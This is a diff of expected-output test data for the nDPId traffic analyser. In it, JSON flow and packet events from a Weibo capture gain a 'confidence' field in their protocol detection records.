+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1463089071612,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1463089071612,"pkt":"eJKcD6iOkDVu60UQCABFAACAAABAAEARtrLAqAEBwKgBaQA1G+wAbIVL26qBgAABAAMAAAAAA3d3dwV3ZWlibwNjb20AAAEAAcAMAAUAAQAAACUAGQN3d3cFd2VpYm8DY29tBWNkbmdjA25ldADAKwABAAEAAAAHAARdvIaJwCsAAQABAAAABwAEXbyGhw=="}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1463089071612,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.137"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1463089071612,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.137"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071613,"flow_last_seen":1463089071613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089071613,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1463089071613,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089071613,"pkt":"kDVu60UQeJKcD6iOCABFAAA84VFAAEAGsxPAqAFpXbyGicnyAFB0WekZAAAAAKACchD\/WQAAAgQFtAQCCAoAQQhIAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089071642,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGnGVdvIaJwKgBaQBQyfKlqmMtdFnpGqAS\/\/8RHAAAAgQFqAQCCAr5u121AEEISAEDAwc="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089071642,"pkt":"kDVu60UQeJKcD6iOCABFAAA04VJAAEAGsxrAqAFpXbyGicnyAFB0WekapapjLoAQAOU+7wAAAQEICgBBCFD5u121"}
-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071730,"flow_last_seen":1463089071730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089071730,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1463089071730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089071730,"pkt":"kDVu60UQeJKcD6iOCABFAAA08m9AAEAG2cLAqAFp2DrURZOqAbsjKGR2xs8noYAQA+RthAAAAQEICgBBCGYlk10U"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089071755,"pkt":"eJKcD6iOkDVu60UQCABFAAA0StsAADYGy1fYOtRFwKgBaQG7k6rGzyehIyhkd4AQAsDqzAAAAQEICiWUDPAAQNxk"}
@@ -52,13 +52,14 @@
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072046,"flow_last_seen":1463089072046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089072046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1463089072046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089072046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dEpAAEAGV+zAqAFp2DrUQYeLAbv4qaw1BowayYAQAO03NAAAAQEICgBBCLUlGFKF"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089072070,"pkt":"eJKcD6iOkDVu60UQCABFAAA0NhEAADYG4CXYOtRBwKgBaQG7h4sGjBrJ+KmsNoAQAV6y1gAAAQEICiUZAmMAQNzC"}
+00885{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1463089071613,"flow_last_seen":1463089072125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1463089072125,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089072138,"pkt":"eJKcD6iOkDVu60UQCABFAAA0XohAABsGZHc24aPSwKgBaQG7nfhaPbwDA69SioAQAIjCywAAAQEICgEjLGEAQNyy"}
-00864{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1463089071613,"flow_last_seen":1463089072285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":12516,"flow_avg_l4_payload_len":391,"midstream":0,"ts_msec":1463089072285,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1463089071613,"flow_last_seen":1463089072285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":12516,"flow_avg_l4_payload_len":391,"midstream":0,"ts_msec":1463089072285,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1463089072333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1463089072333,"pkt":"kDVu60UQeJKcD6iOCABFAAA9J7BAAEARj0XAqAFpwKgBAdEnADUAKd+0rc0BAAABAAAAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQAB"}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1463089072444,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"ts_msec":1463089072444,"pkt":"eJKcD6iOkDVu60UQCABFAACxAABAAEARtoHAqAEBwKgBaQA10ScAnYbirc2BgAABAAUAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQABwAwABQABAAAAAAAHBHdjZG7AEsAtAAUAAQAAACoAFQZzaW5hanMFY3NnbGIFdHhjZG7AGcBAAAUAAQAABBMAFAhuNGNzd2hrMwVnY2NkbgNuZXQAwGEAAQABAAAABAAEXbyG9sBhAAEAAQAAAAQABF28hvE="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1463089072444,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1463089072444,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8AXdAAEAGkoHAqAFpXbyG9ovbAFCLeghvAAAAAKACchAFvgAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -71,27 +72,27 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0fCpAAEAGF9bAqAFpXbyG9ovcAFB8ZHUyz0aFDoAQAOXm+gAAAQEICgBBCR8Ddgkr"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi90SpJVX19aTZ6AS\/\/\/r1QAAAgQFqAQCCAoDdgksAEEJGAEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0mn9AAEAG+YDAqAFpXbyG9ovdAFDX1pNnEqSVWIAQAOUZqgAAAQEICgBBCR8Ddgks"}
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
-00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
